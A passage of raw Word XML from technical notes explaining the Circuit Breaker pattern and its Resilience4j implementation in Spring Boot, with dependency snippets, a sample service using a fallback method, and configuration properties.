          <v:rect id="_x0000_i2776" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A19DFB" w14:textId="6825F0AB" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00E121E6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="674" w:name="_Toc196308154"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Circuit Breaker pattern and its implementation using Resilience4j?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="674"/>
    </w:p>
    <w:p w14:paraId="67365D1B" w14:textId="06F1CB90" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00615C7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="060EC991" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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ircuit Breaker Pattern in Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005784D7" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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 Circuit Breaker pattern is a resilience design pattern used to prevent a system from making repeated calls to a failing service, thereby avoiding system overload and allowing time for recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388FD252" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0020778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28158E9">
          <v:rect id="_x0000_i2777" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00845FB2" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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y Circuit Breaker?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7157F199" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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agine Service A calls Service B. If B is down or slow, A will keep waiting and retrying, leading to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DC74CA" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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igh latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057958A8" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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source exhaustion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4ACE65" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>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scading failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDCB65C" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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Circuit Breaker helps by "breaking" the connection temporarily after a failure threshold is reached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714CADB4" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0020778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73CB6B6">
          <v:rect id="_x0000_i2778" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="151774DC" w14:textId="797FB192" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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ircuit Breaker States</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638833F8" w14:textId="2272317E" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11E17CA1" wp14:editId="4E7D7908">
            <wp:extent cx="6479540" cy="1671320"/>
            <wp:effectExtent l="57150" t="57150" r="92710" b="100330"/>
            <wp:docPr id="1336291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291459" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6479540" cy="167132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1AEACA68" w14:textId="65D288B2" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0020778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F3A5CAD">
          <v:rect id="_x0000_i2779" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C63B466" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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esilience4j Implementation in Spring Boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580C84DF" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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silience4j is a lightweight fault tolerance library designed for Java 8+ and functional programming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7352345A" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AF5CA1" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ircuit Breaker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698150BF" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ate Limiter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21039B6F" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226EC851" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ulkhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F07A0D9" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ime Limiter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B25B02" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>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che</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE619F7" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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Step-by-Step: Circuit Breaker using Resilience4j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7EF485" w14:textId="219EE39A" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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w:t>
      </w:r>
      <w:r w:rsidR="003C3EAB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Add Dependency (Gradle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4290DDE3" w14:textId="77777777" w:rsidR="00FE72FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE72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7635554"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">implementation </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'io.github.resilience4j:resilience4j-spring-boot3:2.1.0'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070E4EA3" w14:textId="47DB44AA" w:rsidR="00FE72FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE72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7635554"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">implementation </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'org.springframework.boot:spring-boot-starter-aop'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AA497A" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>For Maven:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C4AC27" w14:textId="77777777" w:rsidR="00FE72FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE72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892"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0D3114" w14:textId="77777777" w:rsidR="00FE72FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE72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89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lt;groupId&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>io.github.resilience4j</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6120AF18" w14:textId="77777777" w:rsidR="00FE72FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE72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89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lt;artifactId&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>resilience4j-spring-boot3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEA1BF6" w14:textId="77777777" w:rsidR="00FE72FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE72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89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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;version&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2.1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759C2A75" w14:textId="701535EB" w:rsidR="00FE72FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE72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892"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BC9FEC" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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w:t>
      </w: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Sample Service Layer with Circuit Breaker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE19E93"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>@Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8D5FAA"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roductServic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69BFD1D"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2949FADB"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CircuitBreak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productServiceCB"</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fallbackMethod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fallbackGetProducts"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16297BAD"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getProduc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07A66B3"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Simulate failure or call external service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C2CC7B"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if</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andom</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nextInt</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1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l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8</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62B29EF"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hro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untimeExceptio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ervice is down!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F45F7D"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A000894"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f</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Laptop"</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Phon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Tablet"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E55FFF0"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44882DC"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD128B0"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Fallback method must have same signature + Throwable parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1297AB"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fallbackGetProducts</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Throwable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ex</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75149A6"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of</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Fallback Product 1"</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Fallback Product 2"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74832690"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1E2C5F0" w14:textId="0D315A1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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76745E5F" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0020778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6289648">
          <v:rect id="_x0000_i2780" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="69555214" w14:textId="41AD4930" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778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w:t>
      </w:r>
      <w:r w:rsidR="00AA7EC6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Application Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C24F967"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3037279"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>resilience4j</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ircuitbreak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instance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oductServiceCB</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5180AE12"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3037279"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  slidingWindowSiz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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A2D795"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3037279"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  minimumNumberOfCall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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12355050"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3037279"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  failureRateThreshol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0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2256D718"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3037279"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  waitDurationInOpenStat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0s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788678E0"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3037279"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  permittedNumberOfCallsInHalfOpenStat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2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C31B7A" w14:textId="6C86CA1C"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3037279"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  automaticTransitionFromOpenToHalfOpenEnable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true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9F83E6" w14:textId="77777777" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0020778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1A1E1A">
